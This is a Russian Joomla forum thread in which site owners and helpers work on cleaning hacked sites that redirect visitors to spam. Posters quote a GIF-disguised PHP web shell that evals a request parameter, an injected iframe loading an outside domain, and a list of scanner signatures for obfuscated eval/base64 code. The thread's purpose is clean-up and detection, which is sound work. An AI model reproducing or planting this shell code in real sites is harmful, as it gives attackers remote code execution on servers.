0 Пользователей и 1 Гость просматривают эту тему.
  • 792 Ответов
  • 274969 Просмотров
*

evgen777

  • Давно я тут
  • 657
  • 62 / 2
Polosat, вам интересен сам механизм ридеректа?
Разработка, доработка расширений для Joomla!
*

Polosat

  • Захожу иногда
  • 202
  • 7 / 0
  • Мечты - это то, из чего сделано будущее
evgen777 - интересно побороть эту заразу, так как перебрал уже все методы, а через поисковик все равно происходит редирект. Раньше и напрямую был редирект, теперь только через пс Яндекс.

помимо разных стандартных base64, было ещё вот это

images/stories/story.php

Код
GIF89a1
<?php
if (isset($_REQUEST['p1'])) {
eval(stripslashes($_REQUEST['p1']));
} else {
echo "djeu84m";
}
?>
*

Polosat

  • Захожу иногда
  • 202
  • 7 / 0
  • Мечты - это то, из чего сделано будущее
в файле  LICESNE.php в корне Joomla!

Спойлер
[свернуть]
*

evgen777

  • Давно я тут
  • 657
  • 62 / 2
я на 3 сайтах клиента такую бяку вычищал...
побороть можно только одним методом-найти "черный вход" на сайт и перекрыть его.
сделать это можно только анализируя логи доступа к сайту...
Разработка, доработка расширений для Joomla!
*

evgen777

  • Давно я тут
  • 657
  • 62 / 2
Цитировать
images/stories/story.php
это первоначальный шелл служащий для заливки основного шелла
а в LICENSES.php типичный шелл WSO
JCE установлен? Версия ниже 2.2.0?
Разработка, доработка расширений для Joomla!
*

Aleks45

  • Осваиваюсь на форуме
  • 39
  • 0 / 0
@flyingspook вот моя ася 609858754
« Последнее редактирование: 24.01.2013, 21:10:46 от Aleks45 »
*

Polosat

  • Захожу иногда
  • 202
  • 7 / 0
  • Мечты - это то, из чего сделано будущее
Выражаю огромную благодарность товарищу icom

благодаря его меткому глазу и полезному скрипту, и поиску по фразе "eval(ba"  удалось найти зараженные файлы, видимо вебшел пробивал на уязвимость файлы и вписывался куда мог... остатки вредоносного редиректа были во всех файлах плагина JoomDefender и как ни странно в "антивирусном" fls.php

В общем рекомендую в случае когда ничего не помогает, обращаться к icom
*

draff

  • Гуру
  • 5803
  • 434 / 7
  • ищу работу


помимо разных стандартных base64, было ещё вот это

images/stories/story.php

Код
GIF89a1
<?php
if (isset($_REQUEST['p1'])) {
eval(stripslashes($_REQUEST['p1']));
} else {
echo "djeu84m";
}
?>
Ищите еще файл .php там же в /images, содержащим часть названия GIF89a1.
Что то типа cacheGIF89a1.php
*

Polosat

  • Захожу иногда
  • 202
  • 7 / 0
  • Мечты - это то, из чего сделано будущее
draff - спасибо, это все сделал, на этапе "перепробовал все методы"

Тьфу тьфу теперь все чисто.
*

icom

  • Давно я тут
  • 830
  • 202 / 4
Выражаю огромную благодарность товарищу icom

благодаря его меткому глазу и полезному скрипту, и поиску по фразе "eval(ba"  удалось найти зараженные файлы, видимо вебшел пробивал на уязвимость файлы и вписывался куда мог... остатки вредоносного редиректа были во всех файлах плагина JoomDefender и как ни странно в "антивирусном" fls.php

В общем рекомендую в случае когда ничего не помогает, обращаться к icom


с fls.php было все нормально, просто в нем фраза "eval(ba" попалась, что нормально

кстати свой скрипт для поиска и замены текста подправил немного, теперь можно искать используя регулярные выражения + еще некоторые доработки, завтра ссылку выложу
*

ihomyak

  • Осваиваюсь на форуме
  • 11
  • 0 / 0
в файле fls я добавил еще такие строчки в массив $strings
Код
				"strrev(",
"if (isset(\$_GET[\"cookie\"])) { echo 'cookie=",
"\\166\\141\\154\\050b\\141\\163\\145\\066\\064\\137\\144\\145\\143\\157\\144\\145\\050",
"eval(base64_decode"
тоже недавно боролся с взломом 1.5 Joomla.
и еще заметил что в модули добавляется mod_system/mod_google (которого по умолчанию нет в Joomla)
*

maxis

  • Захожу иногда
  • 119
  • 1 / 0
String:: zerofill - это нормально?
*

1kov

  • Осваиваюсь на форуме
  • 31
  • 0 / 0
почти на всех сайтах аккаунта в хостинге появился такой редирект:
36mafia(.)ru

не могу найти где сидит вирусня. помогите  !
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
String:: zerofill - это нормально?
есть по стандарту в движке такое, бывает и в shell тоже, смотрим визуально

Цитировать
не могу найти где сидит вирусня. помогите  !
смотрите
.htaccess посмотрите на редирект
*.js файлы - приписку в конце
*.php - base64 закодированый

в файлах может быть прописан код с права в конце, ползунок переместите если есть место в правую сторону
*

makc9I

  • Захожу иногда
  • 89
  • 0 / 0
подскажите пожалуйста, как это раскодировать
Спойлер
[свернуть]
« Последнее редактирование: 26.01.2013, 13:24:28 от flyingspook »
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Цитировать
подскажите пожалуйста, как это раскодировать
что то типа того но не весь кусок
Спойлер
[свернуть]
*

maxis

  • Захожу иногда
  • 119
  • 1 / 0
А может зараза пролезть, если в некоторых папках отсутствуют пустые index.html?
*

makc9I

  • Захожу иногда
  • 89
  • 0 / 0
flyingspook, можете сказать, КАК вы это сделали? Я гуглил функции декодирование функции eval, но результата не добился.
Заранее спасибо
*

Akksimo

  • Захожу иногда
  • 215
  • 1 / 0
  • Без выходных
Я не понял, как пошагово удалить вирус sejeal?
« Последнее редактирование: 26.01.2013, 03:53:14 от Akksimo »
*

Polosat

  • Захожу иногда
  • 202
  • 7 / 0
  • Мечты - это то, из чего сделано будущее
я делал так

выкачал весь сайт на комп
удалил подозрительные файлы
запустил kaspersky virus removal tool
оно нашло вирусные файлы и удалило их
залил обратно
залил поверх свежую версию Joomla
выполнил пару рекомендация с тем из форума
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Я не понял, как пошагово удалить вирус sejeal?
опишите подробней
-что происходит?
-логи смотрели?
-что сами делали?

вы просите ответить на вопрос который собственно не задали в развернутом виде, на такой вопрос можно ответить только
так - удалить и почистить все
потому что кто знает для него это правильный ответ, а так как вы не знаете и просите помощи пишите развернуто

и будет ответ развернутый
пока набирал вам уже и отвечают  ^-^
*

maxis

  • Захожу иногда
  • 119
  • 1 / 0
fls.php - далеко не всё показывает. Выводит несколько файлов, но их может быть гораздо больше.
*

wishlight

  • Живу я здесь
  • 4975
  • 293 / 1
  • от 150 руб быстрый хостинг без блокировок
ну так вы анализируйте, анализируйте...
*

oleg-great

  • Захожу иногда
  • 50
  • 0 / 0
Чем больше читаю на форуме, тем сильнее запутался. Задам вопросы, по возможности дайте развернутый ответ.
На хостинге размещены 5 сайтов, у 3 из начались глюки в админке с компонетами K2, akeeba backup и основной панелью управления.
Фото:
http://мысли-вслух.рф/_ph/1/140316431.gif - akeeba backup 1
http://мысли-вслух.рф/_ph/1/907223235.gif - akeeba backup 2
http://мысли-вслух.рф/_ph/1/950877315.gif - К2
http://мысли-вслух.рф/_ph/1/449987437.gif - панель управления "Общие настройки" ссылки Сайт, Система, Сервер, Права, Сохранить, Сохранить и закрыть - не кликабельны и вся инфа на одной странице.
http://мысли-вслух.рф/_ph/1/819180442.gif

А у одного сайта белый экрана странице входа в админку.
Решил проблему комментированием этой строки.
Код
<style type="text/css">
HTML { display:none }
  </style>

И случилось это со всеми сайтами одновременно за одну ночь.

Запросил у хостера резервные копии, восстановил, всё отлично стало. Но через день начинается такая же ерунда по очереди на каждом сайте (белый экран, K2, и т.д.).
Скачал сайты на комп, проверил анитивиром. ТИШИНА, ни чего не нашел.

Что делать дальше?

Пробавал тотал командером и Notepad++ искать в файлах текст eval(,  eval(base64_decode и ;document.write(

Есть разные и такие:
Код
;document.write('<iframe style="position:fixed;top:0px;left:-500px;" height="125" width="125" src="http://uhqdn.dns-stuff.com/32f42d6d45c7c.YQkH8OeWVdwmmC?default"></iframe>');

Пробовал ставить fls, выдает кучу файлов, а что с ними делать ума не приложу. Сравнивал файл найденый сканером с оригиналом, они одинаковые.
Скажите что искать в коде файлов?

maxis тоже молодец
Цитировать
"Лично я с помощью fls.php, только на третьей ветке форума случайно понял на что надо обращать внимание"
- раз понял, так объясни другим. Помоги понять.
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Цитировать
Решил проблему комментированием этой строки.
правильное решение обновить до актуальной версии, у Вас костыль
Цитировать
Есть разные и такие:
это и есть "злой" код
вам надо найти shell

по чему и хотел в одну тему обсуждения вынести писать одно и тоже это долго и не благодарно давайте почитаете тут
http://joomlaforum.ru/index.php/topic,247405.0.html
а обсуждать будем все таки тут, уважайте отвечающих они скоро отвечать перестанут прыгая по топикам, и будем видеть только
Спойлер
[свернуть]
*

makc9I

  • Захожу иногда
  • 89
  • 0 / 0
Народ, нужна помощь. Вычистил сайт от заразы, сканируя бесплатным скриптом ai-bolit
Последовал советам из статьи: 7 советов по оптимизации безопасности Joomla!
Залил на хостинг, на сайт не заходит с моего компа вообще, консоль файрфокса выдает: [20:26:51.914] Load denied by X-Frame-Options: http://www.google.ru/ does not permit cross-origin framing.
Друг говорит, что у него грузится, но все с теми же вредоносными iframe
Как быть?
Сайт
« Последнее редактирование: 28.01.2013, 22:34:44 от makc9I »
*

makc9I

  • Захожу иногда
  • 89
  • 0 / 0
flyingspook
Это шутка? Каким мне еще образом показать, что у меня за проблема, если не указывать сайт - ее источник? Полагаю, знающим людям достаточно одного взгляда на зараженный сайт, чтобы понять в чем причина или хотя бы дать какие-либо советы. Если вас это так задевает, скрою заголовок под ссылку.
*

maxis

  • Захожу иногда
  • 119
  • 1 / 0
Это шутка? Каким мне еще образом показать, что у меня за проблема, если не указывать сайт - ее источник?

При загрузке я вижу это -
Спойлер
[свернуть]
Так должно быть?
Но внизу есть сообщение об ошибке: Warning: call_user_func(tdo) [function.call-user-func]: First argument is expected to be a valid callback in /home/d/dalnoboy/public_html/templates/themza_j15_77/html/pagination.php on line 154
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Редирект на спам ссылки. Как лчить?

Автор Евгений1980

Ответов: 2
Просмотров: 337
Последний ответ 14.02.2024, 13:15:59
от wishlight
Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

Ответов: 110
Просмотров: 63071
Последний ответ 30.08.2023, 12:53:33
от SeBun
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

Ответов: 1
Просмотров: 881
Последний ответ 25.05.2023, 08:49:57
от Театрал
Re: Кажется вирус на сайте

Автор motokraft

Ответов: 24
Просмотров: 2930
Последний ответ 04.05.2022, 14:04:17
от ProtectYourSite
Хостинг пишет, что найден вирус в /media/com_media/js/media-manager-es5.js

Автор AlexP750

Ответов: 6
Просмотров: 1733
Последний ответ 22.02.2022, 11:38:15
от AlexP750